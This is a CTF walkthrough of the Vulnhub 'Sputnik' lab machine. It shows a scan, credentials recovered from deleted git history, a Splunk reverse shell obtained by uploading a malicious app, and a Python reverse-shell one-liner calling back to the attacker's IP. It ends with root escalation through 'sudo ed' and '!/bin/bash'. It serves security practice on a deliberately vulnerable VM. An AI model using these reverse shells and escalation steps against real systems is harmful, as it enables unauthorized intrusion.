Sputnik Walkthrough
Description from Vulnhub:
Sputnik is an easy level boot2root machine designed to be a challenge for security enthusiasts to learn and practice compromising machines and penetration testing.
The vulnerable machine was made as a boot2root CTF challenge for an InfoSec community wherein CTF challenges were made by hackstreetboys (a CTF team from Philippines).
Scanning
root :: ~ » nmap -A -sC -sV -p- 192.168.42.24
Nmap scan report for sputnik (192.168.42.24)
Host is up (0.00016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after: 2022-03-28T11:03:21
8191/tcp open limnerpressure?
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 200 OK
| Connection: close
| Content-Type: text/plain
| Content-Length: 85
|_ looks like you are trying to access MongoDB over HTTP on the native driver port.
55555/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 192.168.42.24:55555/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
61337/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://sputnik:61337/en-US/account/login?return_to=%2Fen-US%2F
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.70%I=7%D=7/17%Time=5D2EDCC6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopRepository inside a repository
Nmap picked up an unusual .git directory on port 55555. Let’s start with that. I discovered the remote repository, you can find it here: https://github.com/ameerpornillos/flappy
I quickly went through the commits and discovered a deleted secret file. One of the commits contained login information inside this file. As you can see below on the picture below.
Discovering Splunk
The only login page I found was for Splunk on port 61337. I used the found credentials to log in. I haven’t heard of Splunk before, but here we go.
After I logged in, I started searching for Splunk related vulnerabilities and eventually I found an interesting repository on Github.
Link: https://github.com/TBGSecurity/splunk_shells
The idea is pretty simple. First, we have to upload a custom application (https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz), which basically helps us getting a reverse shell. The path to the menu is: “Apps > Manage Apps > Install app from file”. After that, you have to restart Splunk.
If everything is right you should be presented with a new application.
We need one more step and that is changing the permission of the app to “All apps”. After you saved it, you should be ready to go.
Reverse Shell
Under “Apps > Search & Reporting”, you can find a search bar. As you have probably seen, you can also follow the repository instructions, but I’ll do it anyway. Now, that bar is vulnerable to command injection, which you can exploit by typing:
| revshell [shell_type] [ip] [port]More specifically, I typed the following command and got a netcat connection.
| revshell std 192.168.42.9 9898Hypothetically, you should also be able to use Metasploit for this, but I couldn’t get it to work.
Upgrading the Shell
Let’s upgrade this barely functional shell to something more usable. It’s a bit trickier than usual, but nothing extra. When you get a connection back with netcat, you can’t spawn a pseudo TTY with Python. I had to take one more step to get it working. I executed another reverse shell with the help of a Python one-liner.
root :: ~ » nc -lvp 9898
listening on [any] 9898 ...
connect to [192.168.42.9] from sputnik [192.168.42.24] 46214
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.42.9",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Now, we have the ability to spawn a pseudo TTY shell.
root :: ~ » nc -lvp 9999
listening on [any] 9999 ...
connect to [192.168.42.9] from sputnik [192.168.42.24] 35594
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
splunk@sputnik:/$Actually, I did the extensive enumeration with LinEnum, but I’ll just show you the important part. We are able to run the ed program as root.
splunk@sputnik:/$ sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_jobMatching Defaults entries for splunk on sputnik:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser splunk may run the following commands on sputnik:
(root) /bin/ed
splunk@sputnik:/$
Privilege Escalation to Root
You can easily spawn a Bash shell with ed . All you have to do is put an exclamation mark before the path and that’s it!
splunk@sputnik:/$ sudo ed
[sudo] password for splunk: ameer_says_thank_you_and_good_job
!/bin/bash
root@sputnik:/# id
uid=0(root) gid=0(root) groups=0(root)The Flag
Finally, we can print out the well-deserved root flag!
root@sputnik:~# cat flag.txt
cat flag.txt
_________________________________________
/ Congratulations! \
| |
| You did it! |
| |
| Thank you for trying out this challenge |
| and hope that you learn a thing or two. |
| |
| Check the flag below. |
| |
| flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr3 |
| 4t_r3sp0ns1b1l1ty} |
| |
| Hope you enjoy solving this challenge. |
| :D |
| |
\ - ameer (from hackstreetboys) /
-----------------------------------------
\ / \ //\
\ |\___/| / \// \\
/0 0 \__ / // | \ \
/ / \/_/ // | \ \
@_^_@'/ \/_ // | \ \
//_^_/ \/_ // | \ \
( //) | \/// | \ \
( / /) _|_ / ) // | \ _\
( // /) '/,_ _ _/ ( ; -. | _ _\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\ / ~-. _ .-~ .-~^-. \
(( /// )) `. { } / \ \
(( / )) .----~-.\ \-' .~ \ `. \^-.
///.----..> \ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~
root@sputnik:~#flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr34t_r3sp0ns1b1l1ty}
Before you go
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏
